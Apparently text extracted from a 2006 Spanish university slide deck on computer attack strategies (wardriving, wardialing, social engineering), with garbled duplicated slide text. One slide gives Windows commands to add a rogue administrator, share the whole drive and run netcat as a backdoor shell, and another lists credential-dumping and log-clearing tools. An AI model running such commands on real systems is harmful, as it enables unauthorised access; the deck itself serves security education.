Post on 12-Jun-2015
description
ESTRATEGIAS DE ATAQUE EN SEGURIDAD
INFORMATICA
Grupo de I+D en Tecnologías de la Información (GTI)
(Esp) Siler Amador Donadosamador@unicauca.edu.co
http://gseguridad.unicauca.edu.co
AGENDAHackers vs CrackersEl riesgo en la seguridad informáticaPérdidas económicas por ataques informáticosTécnicas de ataqueVectores de ataque a una redY si tienen la oportunidad…Caja de herramientas de ataque La próxima generación de Troyanos KeylogersDemo 1 (Ataque Masivo)Demo 2 (Defaced)… Y en la Unicauca que?Conclusiones
HACKERS VS CRACKERS
HackersHackers
Asesoran
Asesoran
Etic
aEt
ica
Construyen
Construyen
CrackersCrackers
EgoEgoíístas
stas
Del
incu
ente
sD
elin
cuen
tes
Destruyen
Destruyen
EL RIESGO EN LA SEGURIDAD INFORMÁTICA
PÉRDIDAS POR ATAQUES CCS/FBI 2005
PÉRDIDAS POR ATAQUES CCS/FBI 2005
$67.2 billones por año
$7.6 millones por hora
TECNICAS DE ATAQUE
Wardriving: Nombre que recibe la búsqueda de redes inalámbricas para documentar su posición. Para realizar esta búsqueda se necesita como mínimo un equipo móvil (portátil) con tarjeta Wireless, y si queremos que la posición sea precisa, un GPS para pasar los datos a un mapa.
Objetivo: Conectarse al punto de acceso (AP) mal configurado e ingresar a la la red local de la empresa.
Herramientas:NetStumblerKismethttp://www.wardrive.net/wardriving/tools
TECNICAS DE ATAQUE
Wardialing: Fue una técnica de los 80´s y 90´s, consitía en marcar repetidamente a modems y PBX´s disponibles en la red y de esta forma irrumpir a sistemas remotos.
Objetivo: Conectarse a modems o PBX´s mal configurados e ingresar a la la red local de la empresa.
Herramientas: THC-Scan 2.0ModemScanShokDial
TECNICAS DE ATAQUE
Cracking: Modificar un programa para obtener beneficios. Normalmente se basa en quitar pantallas introductorias, protecciones o, como en unas modificaciones de cierto programa de comunicaciones, conseguir nuevos passwords de acceso a sistemas.
Objetivo:Tener acceso al software o a la red interna.
Herramientas:Las 100 mejores http://sectools.org/Inyección SQLXSS
TECNICAS DE ATAQUE
Ing. Social: Persuadir a otra persona (a través de diversas formas) para que nos de un dato útil para cumplir un objetivo. Este dato puede ser un password, un código, etc. incluso pueden dar nombres de familiares y fechas importantes, que siempre se usan para formar claves.
Objetivo: Obtener información sensible que nos permita el acceso a la red.
Herramientas: TeléfonoMucha psicologíaInteligencia emocionalhttp://www.laflecha.net/perfiles/tecnologia/kevin_mitnick/
VECTORES DE ATAQUE A UNA REDPuntos de acceso
INTE
RN
ETIN
TER
NET M
OD
EMM
OD
EMWIRELESSWIRELESS
FISICOFISICO
REDRED
WardrivingWardriving
Ing. SocialIng. Social
Wardialing
WardialingC
rack
ing
Cra
ckin
g
Y si tienen la oportunidad…
Menos de 1 minuto es suficiente para:1. Crear una cuenta con privilegios de Admin!!!
1. Abrir la consola de comandos2. C:\net user cracker siti2006 /add3. C:\net localgroup administradores cracker /add
2. Compartir toda la unidad del disco!!!1. C:\net share siti2006=c:\ /remark:”Demo SITI2006”
3. Colocar un programa en escucha!!!1. http://gseguridad.unicauca.edu.co/nc.exe2. C:\WINNT\System32\nc.exe -d -L -p 55555 -e cmd.exe
Caja de Herramientas de ataque en línea de comandos
fport.exe - shows open ports and the process that owns the portiplist.exe - enumerates the ip's of the computermd5.exe - gets the md5 hash of a filepw2kget.exe - for win2k gets the password of the currently logged on userpwreveal.exe - gets the passwords of any window that has a ****** editboxregshell.exe - a commandline registry explorer/editorsendmail.exe - a commandline email senderuptime.exe - gets the machines current uptimexwhois - advanced whois lookupScreencap.exe - makes a screenshot of the screen and saves it to screenshot.bmpCMDget.exe - Downloads a file from a website from user provided parameterswebscr.exe - creates a snapshot from the webcam and saves itshutd.exe - program that forces shutdown/reboot of machinebnc.exe - bnc for windows (see bnc.cfg)clslog.exe - clears app/security/system logs XP/NT/2k enum.exe - enumerates IPC$ share to collect informationwinfo.exe - enumerates IPC$ share to collect informationFTPd.exe - small ftp server for dos (see slimftpd.conf)Global.exe - process dos command on all disc/subdirsiislog.exe - clears IIS logsInfo.exe - gets system informationispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir)nc.exe - netcatpv.exe - process manager for dosPwdump.exe - dumps SAM hashesscrnmode.exe - change screen mode from dosunrar.exe - unrar for doswget.exe - wget for windowswizmo.exe - command tool (see w.txt)dwpp.exe - dial up password graberwinrelay.exe - relay tcp/udp connectionsgetad.exe - escalate to admin user in w2kpipeup.exe - escalate to admin user in w2kdnsid - identify remore dns server
Agradecimientos a: NetrangerTomado de: http://www.governmentsecurity.org/forum/lofiversion/index.php/t2824.html
LA PRÓXIMA GENERACION DE TROYANOS KEYLOGERS…
http://www.hispasec.com/laboratorio/troyano_video.htm
DEMO1 - ATAQUE MASIVOEscenario
SITI 2006SITI 2006 LANLAN
ATACANTEATACANTE MAESTROMAESTRO
ZOMBIESZOMBIES
LinuxMetasploit
Scripts en Python
WindowsWin/XP/2K
http://www.microsoft.com/spain/technet/seguridad/boletines/ms05-039-it.mspx
... Y en la Unicauca que?
• Electiva de seguridad informática• Área de interés en seguridad informática del GTI. (Proyectos de tesis
de grado)• Legislación en comercio electrónico (Finalizado)• OBSES (Firewall Cluster Beowulf) (Finalizado)• INFORCE (Finalizado)• Antivirus-inteligente (En desarrollo)• Estudio de las tendencias predictivas sobre la escogencia de
contraseñas basado en redes bayesianas (En desarrollo)• Proyecto de Auditoría informática UNICAUCA • Publicaciones
PreocupaciPreocupacióón del departamento de sistemas de la FIET sobre n del departamento de sistemas de la FIET sobre la problemla problemáática de la seguridad de la informacitica de la seguridad de la informacióón.n.
CONCLUSIONESLos ataques de seguridad informática a nivel mundial son aislados? Inversión en guerra informática? ECHELON, ENFOPOL, CARNÍVORO…• USA• UK• CHINA• RUSIA
Los sistemas de seguridad actuales son reactivos y correctivos.• Preventivos• Inteligentes
Existen demasiadas herramientas de ataque gratis y disponibles en la red.Las técnicas de ataque cabian constantemente.Segun las estadísticas es muy probable que su sistema hayasido vulnerado y usted aún no lo sepa!!!.